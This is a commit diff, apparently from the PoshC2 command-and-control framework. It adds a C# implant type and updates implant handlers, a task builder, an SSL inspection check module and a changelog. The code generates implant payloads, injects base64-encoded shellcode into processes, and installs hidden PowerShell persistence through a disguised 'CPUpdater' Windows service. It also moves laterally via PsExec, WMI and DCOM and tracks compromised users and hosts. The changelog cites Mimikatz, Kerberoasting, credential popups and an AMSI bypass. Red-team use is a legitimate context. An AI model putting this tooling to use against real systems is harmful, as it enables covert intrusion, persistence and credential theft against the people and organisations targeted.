proxypass = raw_input("Proxy Password: e.g. Password1 ")
proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
credsexpire = raw_input("Password/Account Expiration Date: .e.g. 15/03/2018 ")
credsexpire = raw_input("Password/Account Expiration Date: .e.g. 15/03/2018 ")
update_item("ProxyURL", "C2Server", proxyurl)
update_item("ProxyUser", "C2Server", proxyuser)
update_item("ProxyPass", "C2Server", proxypass)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
newPayload.CreateRaw("Proxy")
@ -46,14 +46,14 @@ def createdaisypayload():
daisyhost = get_implantbyid(daisyhostid)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], daisyurl, "", daisyport, "", "", "",
newPayload = Payloads(C2[5], C2[2], daisyurl, "", daisyport, "", "", "",
"", proxynone, C2[19], C2[20],
C2[21], "%s?d" % get_newimplanturl(), PayloadsDirectory)
newPayload.C2Core = (newPayload.C2Core).replace("$pid;%s" % (daisyurl+":"+daisyport),"$pid;%s@%s" % (daisyhost[11],daisyhost[3]))
newPayload.CreateRaw(name)
newPayload.CreateDlls(name)
newPayload.CreateShellcode(name)
newPayload.CreateEXE(name)
newPayload.CreateShellcode(name)
newPayload.CreateEXE(name)
newPayload.CreateMsbuild(name)
new_urldetails( name, C2[1], C2[3], domain, daisyurl, daisyhostid, "" )
startup("Created new %s daisy payloads" % name)
@ -78,7 +78,7 @@ def createnewpayload():
domainbase = "%s%s" % (randomid,domainbase)
imurl = get_newimplanturl()
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], domain, domainfront, C2[8], proxyuser,
newPayload = Payloads(C2[5], C2[2], domain, domainfront, C2[8], proxyuser,
proxypass, proxyurl, "", "", C2[19], C2[20],
C2[21], imurl, PayloadsDirectory)
newPayload.CreateRaw("%s_" % domainbase)
@ -92,11 +92,11 @@ def createnewpayload():
def argp(cmd):
args = ""
try:
try:
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('-Help', '-help', '-h', action='store', dest='help', required=False)
parser.add_argument('-Source', '-source', action='store', dest='source', required=True)
parser.add_argument('-Destination', '-destination', action='store', dest='destination', required=True)
parser.add_argument('-Destination', '-destination', action='store', dest='destination', required=True)
parser.add_argument('-NotHidden', '-nothidden', action='store', dest='nothidden', required=False)
args, unknown = parser.parse_known_args(shlex.split(cmd))
except:
@ -118,7 +118,7 @@ def complete(text, state):
def load_file( location ):
fr = None
try:
file = open((location), "rb")
file = open((location), "rb")
fr = file.read()
except Exception as e:
print ("Error loading file %s" % e)
@ -142,12 +142,12 @@ def migrate(randomuri, params=""):
shellcodefile = load_file("%s/payloads/Posh-shellcode_x%s.bin" % (ROOTDIR,arch))
elif implant_comms == "Daisy":
daisyname = raw_input("Name required: ")
shellcodefile = load_file("%s/payloads/%sPosh-shellcode_x%s.bin" % (ROOTDIR,daisyname,arch))
shellcodefile = load_file("%s/payloads/%sPosh-shellcode_x%s.bin" % (ROOTDIR,daisyname,arch))
elif implant_comms == "Proxy":
shellcodefile = load_file("%s/payloads/ProxyPosh-shellcode_x%s.bin" % (ROOTDIR,arch))
check_module_loaded("Inject-Shellcode.ps1", randomuri)
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), randomuri)
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), randomuri)
def startup(printhelp = ""):
@ -302,16 +302,16 @@ def startup(printhelp = ""):
hostname = get_implantdetails(t[2])
if hostname[2] not in users:
users += "%s \n" % hostname[2]
if "Upload-File" in t[3]:
if "Upload-File" in t[3]:
uploadedfile = t[3]
uploadedfile = uploadedfile.partition("estination ")[2]
uploadedfile = uploadedfile.partition(" -Base64")[0]
uploads += "%s %s \n" % (hostname[3], uploadedfile)
uploads += "%s %s \n" % (hostname[3], uploadedfile)
if "Installing persistence" in t[4]:
hostname = get_implantdetails(t[2])
line = t[4].replace('\n','')
line = line.replace('\r','')
filenameuploaded = line.rstrip().split(":",1)[1]
filenameuploaded = line.rstrip().split(":",1)[1]
uploads += "%s %s \n" % (hostname[3], filenameuploaded)
startup("Users Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s" % (users, hosts, urls, uploads))
if "listmodules" in implant_id.lower():
@ -380,7 +380,7 @@ def startup(printhelp = ""):
time.sleep(10)
startup()
def runcommand(command, randomuri):
def runcommand(command, randomuri):
if command:
try:
last = get_lastcommand()
@ -393,7 +393,7 @@ def runcommand(command, randomuri):
ExError = e
implant_type = get_implanttype(randomuri)
if implant_type == "OSX":
if implant_type == "OSX":
if 'beacon' in command.lower() or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
command = command.replace('set-beacon ', '')
command = command.replace('setbeacon ', '')
@ -450,7 +450,7 @@ def runcommand(command, randomuri):
new_task(uploadcommand, randomuri)
except Exception as e:
print ("Error with source file: %s" % e )
traceback.print_exc()
traceback.print_exc()
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
print (py_help1)
@ -484,13 +484,74 @@ def runcommand(command, randomuri):
kill_implant(randomuri)
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
startup()
startup()
else:
if command:
new_task(command, randomuri)
return
elif implant_type == "C#":
if "searchhelp" in command.lower():
searchterm = (command.lower()).replace("searchhelp ","")
import string
helpfull = string.split(sharp_help1, '\n')
for line in helpfull:
if searchterm in line:
print (line)
elif "unhide-implant" in command.lower():
unhide_implant(randomuri)
elif "hide-implant" in command.lower():
kill_implant(randomuri)
elif "kill-implant" in command.lower() or "exit" in command.lower():
impid = get_implantdetails(randomuri)
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
if ri.lower() == "n":
print ("Implant not terminated")
if ri == "":
pid = get_pid(randomuri)
new_task("exit",randomuri)
kill_implant(randomuri)
if ri.lower() == "y":
pid = get_pid(randomuri)
new_task("exit" % pid,randomuri)
kill_implant(randomuri)
elif (command.lower() == "ps") or (command.lower() == "ps "):
check_module_loaded("Get-ProcessList.dll", randomuri)
new_task(command,randomuri)
elif "loadmoduleforce" in command.lower():
params = re.compile("loadmoduleforce ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, force=True)
elif "loadmodule" in command.lower():
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri)
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
print (sharp_help1)
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
startup()
elif ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
new_task(command, randomuri)
command = command.replace('set-beacon ', '')
command = command.replace('setbeacon ', '')
command = command.replace('beacon ', '')
update_sleep(command, randomuri)
else:
if command:
new_task(command, randomuri)
return
else:
try:
check_module_loaded("Implant-Core.ps1", randomuri)
@ -522,24 +583,24 @@ def runcommand(command, randomuri):
if C2[11] == "":
startup("Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
new_task(cmd, randomuri)
elif "install-servicelevel-persistence" in command.lower():
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
new_task(cmd, randomuri)
elif "remove-servicelevel-persistence" in command.lower():
new_task("sc.exe delete CPUpdater", randomuri)
new_task("sc.exe delete CPUpdater", randomuri)
# psexec lateral movement
elif "get-implantworkingdirectory" in command.lower():
@ -550,7 +611,7 @@ def runcommand(command, randomuri):
if C2[11] == "":
startup("Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
@ -564,7 +625,7 @@ def runcommand(command, randomuri):
elif "get-system-withdaisy" in command.lower():
C2 = get_c2server_all()
daisyname = raw_input("Payload name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, randomuri)
@ -575,7 +636,7 @@ def runcommand(command, randomuri):
elif "get-system" in command.lower():
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
@ -601,7 +662,7 @@ def runcommand(command, randomuri):
if C2[11] == "":
startup("Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
@ -613,7 +674,7 @@ def runcommand(command, randomuri):
elif "invoke-psexecdaisypayload" in command.lower():
check_module_loaded("Invoke-PsExec.ps1", randomuri)
daisyname = raw_input("Payload name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
params = re.compile("invoke-psexecdaisypayload ", re.IGNORECASE)
params = params.sub("", command)
@ -625,7 +686,7 @@ def runcommand(command, randomuri):
elif "invoke-psexecpayload" in command.lower():
check_module_loaded("Invoke-PsExec.ps1", randomuri)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
@ -642,7 +703,7 @@ def runcommand(command, randomuri):
if C2[11] == "":
startup("Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
@ -654,7 +715,7 @@ def runcommand(command, randomuri):
elif "invoke-wmidaisypayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri)
daisyname = raw_input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
params = re.compile("invoke-wmidaisypayload ", re.IGNORECASE)
params = params.sub("", command)
@ -666,7 +727,7 @@ def runcommand(command, randomuri):
elif "invoke-wmipayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
@ -679,7 +740,7 @@ def runcommand(command, randomuri):
elif "invoke-dcomproxypayload" in command.lower():
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
@ -690,7 +751,7 @@ def runcommand(command, randomuri):
elif "invoke-dcomdaisypayload" in command.lower():
daisyname = raw_input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
p = re.compile(ur'(?<=-target.).*')
target = re.search(p, command).group()
@ -701,7 +762,7 @@ def runcommand(command, randomuri):
elif "invoke-dcompayload" in command.lower():
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
@ -714,7 +775,7 @@ def runcommand(command, randomuri):
elif "invoke-runasdaisypayload" in command.lower():
daisyname = raw_input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
new_task("$proxypayload = \"%s\"" % payload, randomuri)
check_module_loaded("Invoke-RunAs.ps1", randomuri)
@ -732,7 +793,7 @@ def runcommand(command, randomuri):
if C2[11] == "":
startup("Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
@ -766,13 +827,13 @@ def runcommand(command, randomuri):
elif command.lower() == "help 4":
print (posh_help4)
elif command.lower() == "help 5":
print (posh_help5)
print (posh_help5)
elif command.lower() == "help 6":
print (posh_help6)
elif command.lower() == "help 7":
print (posh_help7)
elif command.lower() == "help 8":
print (posh_help8)
print (posh_help8)
elif "get-pid" in command.lower():
@ -796,11 +857,11 @@ def runcommand(command, randomuri):
if (args.nothidden):
uploadcommand = "Upload-File -Destination \"%s\" -NotHidden %s -Base64 %s" % (destination, args.nothidden, source)
else:
uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (destination, source)
uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (destination, source)
new_task(uploadcommand, randomuri)
except Exception as e:
print ("Error with source file: %s" % e)
traceback.print_exc()
print ("Error with source file: %s" % e)
traceback.print_exc()
elif "kill-implant" in command.lower() or "exit" in command.lower():
impid = get_implantdetails(randomuri)
@ -855,15 +916,15 @@ def runcommand(command, randomuri):
shellcodefile = load_file(path)
if shellcodefile != None:
arch = "64"
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), randomuri)
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), randomuri)
except Exception as e:
print ("Error loading file: %s" % e)
elif "listmodules" in command.lower():
elif "listmodules" in command.lower():
print (os.listdir("%s/Modules/" % POSHDIR))
elif "modulesloaded" in command.lower():
elif "modulesloaded" in command.lower():
ml = get_implantdetails(randomuri)
print (ml[14])
@ -925,7 +986,12 @@ def commandloop(implant_id):
else:
hostname = get_hostdetails(implant_id)
if hostname[15] == 'OSX':
t.createListCompleter(UXCOMMANDS )
t.createListCompleter(UXCOMMANDS)
readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete")
readline.set_completer(t.listCompleter)
if hostname[15] == 'C#':
t.createListCompleter(SHARPCOMMANDS)
readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete")
readline.set_completer(t.listCompleter)
@ -956,7 +1022,7 @@ def commandloop(implant_id):
runcommand(command, implant_id)
except Exception as e:
print ("Unknown ImplantID")
# else run against single uri
# else run against single uri
else:
implant_id = get_randomuri(implant_id)
runcommand(command, implant_id)

0
Modules/Cred-Popper.ps1 Executable file → Normal file
View File

2
Modules/Get-Hash.ps1 Executable file → Normal file
View File

File diff suppressed because one or more lines are too long

BIN
Modules/Get-ProcessList.dll Executable file
View File

Binary file not shown.

20
Modules/SSLInspectionCheck.ps1
View File

@ -1,22 +1,30 @@
function SSLInspectionCheck($url, $proxyurl, $proxyuser, $proxypass){
$expiration = $null
$certName = $null
$certPublicKeyString = $null
$certSerialNumber = $null
$certThumbprint = $null
$certEffectiveDate = $null
$certIssuer = $null
write-output "Checking $($url)"
$req = [Net.HttpWebRequest]::Create($url)
if ($proxyurl) {
$wc = New-Object System.Net.WebClient;
$wp = New-Object System.Net.WebProxy($proxyurl,$true)
$PSS = ConvertTo-SecureString $proxypass -AsPlainText -Force;
$getcreds = new-object system.management.automation.PSCredential $proxyuser,$PSS;
$PSS = ConvertTo-SecureString $proxypass -AsPlainText -Force;
$getcreds = new-object system.management.automation.PSCredential $proxyuser,$PSS;
$wp.Credentials = $getcreds;
$req.Proxy=$wp;
}
$req.timeout = 10000
try {
$req.GetResponse() |Out-Null
} catch {
try {
$req.GetResponse() |Out-Null
} catch {
write-output "Exception while checking URL $($url)`: $($_)"
}
@ -30,4 +38,4 @@ function SSLInspectionCheck($url, $proxyurl, $proxyuser, $proxypass){
write-output "Cert for site $($url). Check details:`n`nCert name: $($certName)`nCert public key: $($certPublicKeyString)`nCert serial number: $($certSerialNumber)`nCert thumbprint: $($certThumbprint)`nCert effective date: $($certEffectiveDate)`nCert Expiry: $($expiration)`nCert issuer: $($certIssuer)"
rv req
}
}

BIN
Modules/Seatbelt.exe Executable file
View File

Binary file not shown.

133
Payloads.py
View File

File diff suppressed because one or more lines are too long

16
Tasks.py
View File

@ -2,7 +2,7 @@
from Colours import *
from Core import *
import DB
import DB
def newTask(path):
result = DB.get_implants_all()
@ -26,7 +26,7 @@ def newTask(path):
print "Loading Shellcode",Colours.END
elif "upload-file" in command.lower():
print "Uploading File",Colours.END
else:
else:
try:
print command,Colours.END
except Exception as e:
@ -35,10 +35,16 @@ def newTask(path):
if a[2].startswith("loadmodule"):
try:
module_name = (a[2]).replace("loadmodule ","")
modulestr = load_module(module_name)
if ".exe" in module_name:
modulestr = load_module_sharp(module_name)
elif ".dll" in module_name:
modulestr = load_module_sharp(module_name)
else:
modulestr = load_module(module_name)
command = "loadmodule%s" % modulestr
except Exception as e:
print "Cannot find module, loadmodule is case sensitive!"
print e
if commands:
commands += "!d-3dion@LD!-d" + command
else:
@ -47,8 +53,6 @@ def newTask(path):
if commands is not None:
multicmd = "multicmd%s" % commands
try:
responseVal = encrypt(EncKey, multicmd)
except Exception as e:
@ -64,4 +68,4 @@ def newTask(path):
return default_response()
#else:
# return None

25
changelog.txt
View File

@ -1,5 +1,20 @@
4.6 (26/12/18)
==============
Added Sharp Implant and corresponding DLLs/Shellcode
4.5 (19/11/18)
==============
Removed Invoke-Enum
Merged Get-TokenElevationType.ps1 by jmhickman
Added TLS Config to Python Server
Updated README
Updated Get-IPAddress
Merged OfflineReportGenerator.py by skahwah
Updated to latest PowerUp.ps1
Updated INSTALL notes
Updated to work with FIPSAlgorithmPolicy
Updated to latest Invoke-Kerberoast & Invoke-Mimikatz
Removed process start for Netsh.exe on non migrate executable
4.4 (10/11/18)
==============
@ -11,7 +26,7 @@ Identify if SSL inspection is enabled for web traffic
Obtain a user hash using the methods from 'Internal-Monologue'
Updated to handle accents on hostnames or users
Updated Get-Processfull & Get-Processlist to handle errors on GetOwner()
Updated syntax error in WMIEvent module
Updated syntax error in WMIEvent module
Updated Shellcode/DLL to support scriptblock / transcript bypass
Updated default ps command - Now uses Get-ProcessList not Get-ProcessFull
Updated opsec command to add users compromised
@ -34,14 +49,14 @@ Added standalone msbuild.xml output format to payloads.py
Update Msbuild.xml to work with Windows10 64bit (replaced mem.copy to WriteProcessMemory)
Updated Inject-Shellcode to remove processpath and leave procpath
Added Get-ProcessList Module which uses winapi to do ps list (pinvoke - CreateToolhelp32Snapshot)
Added QueueUserAPC to Inject-Shellcode (migrate -Suspended -QueueUserAPC)
Merge pull request #6 from m0rv4i/update-script
Added QueueUserAPC to Inject-Shellcode (migrate -Suspended -QueueUserAPC)
Merge pull request #6 from m0rv4i/update-script
Updated Inject-Shellcode base directory to /proj/payloads
Updated output-to-html to Encode HTML Chars
Updated show-serverinfo
Added CSC output format to payloads.py
Added List-URLs Command to DB
Updated CredPopper puts default username and has minimum password limit
Updated CredPopper puts default username and has minimum password limit
Minor changes to documentation
4.2
@ -84,4 +99,4 @@ Updated to remove requirement for pycrypto for Python implants
Updated Brute-AD to Add Domain Flag
Updated Brute-AD Module
Updated to include AMSI Bypass
Updated PoshC2 to have the AMSI bypass by default in the Shellcode
Updated PoshC2 to have the AMSI bypass by default in the Shellcode